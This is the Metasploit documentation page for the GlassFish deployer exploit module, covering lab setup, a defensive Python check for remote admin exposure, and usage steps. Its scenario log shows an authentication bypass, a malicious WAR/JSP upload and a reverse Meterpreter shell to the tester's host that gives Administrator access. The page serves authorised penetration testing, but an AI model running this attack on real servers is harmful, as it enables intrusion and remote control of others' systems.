rapid7/metasploit-framework

documentation/modules/exploit/multi/http/glassfish_deployer.md

## Vulnerable Application

### Description

This module logs in to a GlassFish Server (Open Source or Commercial) using various methods (such as authentication bypass, default credentials, or user-supplied login), and deploys a malicious WAR file in order to get remote code execution. It has been tested on GlassFish 2.x, 3.0, 4.0 and Sun Java System Application Server 9.x. Newer GlassFish versions do not allow remote access (Secure Admin) by default, but remote access is required for exploitation.

### GlassFish

GlassFish is an open-source application server project started by Sun Microsystems for the Java EE platform and now sponsored by Oracle Corporation. The supported version is called Oracle GlassFish Server. GlassFish is free software, dual-licensed under two free software licences: the Common Development and Distribution License (CDDL) and the GNU General Public License (GPL) with the classpath exception.

### Installation

For testing purposes, the following explains how you can install a vulnerable version of GlassFish on Ubuntu Linux:

1. Make sure you have a clean Ubuntu box
2. Open a terminal on the Ubuntu box, and do: ```sudo apt-get install default-jdk```. We assume this gives you JDK 8.
3. Download [GlassFish 4.0](http://download.java.net/glassfish/4.0/release/glassfish-4.0.zip)
4. Unzip GlassFish-4.0, navigate to the bin directory, and then start ```asadmin```
5. In the asadmin console, do ```start-domain domain1```. This will start GlassFish.
6. On the Ubuntu box, go to http://localhost:4848 with a browser
7. On the left menu, click on ```Domain```
8. On the right, click on ```Administrator Password```
9. Set a new password for admin
10. On the left menu, click on ```server (Admin server)```
11. On the right, click on ```Secure Administrator```
12. Click on ```Enable Secure Admin```
13. You will need to wait for up to a minute to make sure GlassFish is up and running again on port 4848.

If you are on a different platform (such as Windows), the installation should be quite similar.
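Steps 10 to 12 are what make the admin console reachable from another host. The following is an added example, not part of the module or of GlassFish: a small audit that reads a domain's `domain.xml` and reports whether that state is in effect. The `secure-admin` and `network-listener` element and attribute names, and the all-interfaces default when no `address` is set, are assumptions based on the GlassFish 4.0 configuration layout; the sample XML is constructed.

```python
import xml.etree.ElementTree as ET

# Constructed sample, not taken from a real server. Element and attribute
# names are assumed from the GlassFish 4.0 layout; compare with your own
# glassfish/domains/<domain>/config/domain.xml before relying on the result.
SAMPLE_DOMAIN_XML = """\
<domain>
  <secure-admin enabled="true" special-admin-indicator="constructed-value"/>
  <configs>
    <config name="server-config">
      <network-config>
        <network-listeners>
          <network-listener name="http-listener-1" port="8080" protocol="http-listener-1"/>
          <network-listener name="admin-listener" port="4848" protocol="admin-listener"/>
        </network-listeners>
      </network-config>
    </config>
  </configs>
</domain>
"""

LOOPBACK = {"127.0.0.1", "localhost", "::1"}


def audit_admin_exposure(domain_xml: str) -> dict:
    """Report whether the admin listener accepts connections from other hosts.

    Applies to versions that gate remote administration behind Secure Admin;
    older releases allow remote admin without it.
    """
    root = ET.fromstring(domain_xml)
    sa = root.find("secure-admin")
    secure_admin = sa is not None and sa.get("enabled", "false").lower() == "true"
    listeners = []
    for cfg in root.iterfind(".//config"):
        for nl in cfg.iter("network-listener"):
            if nl.get("name") != "admin-listener":
                continue
            # Assumption: a listener without an address binds to all interfaces.
            addr = nl.get("address", "0.0.0.0")
            listeners.append({"config": cfg.get("name"), "port": int(nl.get("port", "4848")),
                              "address": addr, "loopback_only": addr in LOOPBACK})
    remote = secure_admin and any(not l["loopback_only"] for l in listeners)
    return {"secure_admin": secure_admin, "admin_listeners": listeners,
            "remote_admin_reachable": remote}


if __name__ == "__main__":
    print(audit_admin_exposure(SAMPLE_DOMAIN_XML))
```

On a production server, a `remote_admin_reachable` result of `True` means port 4848 should be restricted to a management network and the admin password checked against defaults.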

## Verification Steps

1. Do: ```use exploit/multi/http/glassfish_deployer```
2. Do: ```set RHOST [IP]```
3. Do: ```set USERNAME [Username]```
4. Do: ```set PASSWORD [Password]```
5. Do: ```run```

## Scenarios

### GlassFish 3.0.1 on Windows 2003

```
msf > use exploit/multi/http/glassfish_deployer
msf exploit(glassfish_deployer) > set RHOST 172.16.182.237
RHOST => 172.16.182.237
msf exploit(glassfish_deployer) > set USERNAME admin
USERNAME => admin
msf exploit(glassfish_deployer) > set PASSWORD admin123
PASSWORD => admin123
msf exploit(glassfish_deployer) > exploit
[*] Started reverse TCP handler on 172.16.182.112:4444 
[*] Glassfish edition: GlassFish Server Open Source Edition 3.0.1
[*] Trying GlassFish authentication bypass..
[+] http://172.16.182.237:4848// - GlassFish - SUCCESSFUL authentication bypass
[*] Uploading payload...
[*] Successfully uploaded
[*] Executing /icDfejbl6Vc9ZobfgVv9LIBES/SV7fVtWuTQFZqtzMPiJ.jsp...
[*] Sending stage (30355 bytes) to 172.16.182.237
[*] Meterpreter session 1 opened (172.16.182.112:4444 -> 172.16.182.237:1472) at 2017-03-27 19:07:58 -0500
[*] Getting information to undeploy...
[*] Undeploying icDfejbl6Vc9ZobfgVv9LIBES...
[*] Undeployment complete.

meterpreter > getuid
Server username: Administrator
meterpreter > sysinfo
Computer    : juan-6ed9db6ca8
OS          : Windows 2003 5.2 (x86)
Meterpreter : java/java
meterpreter > exit
[*] Shutting down Meterpreter...

```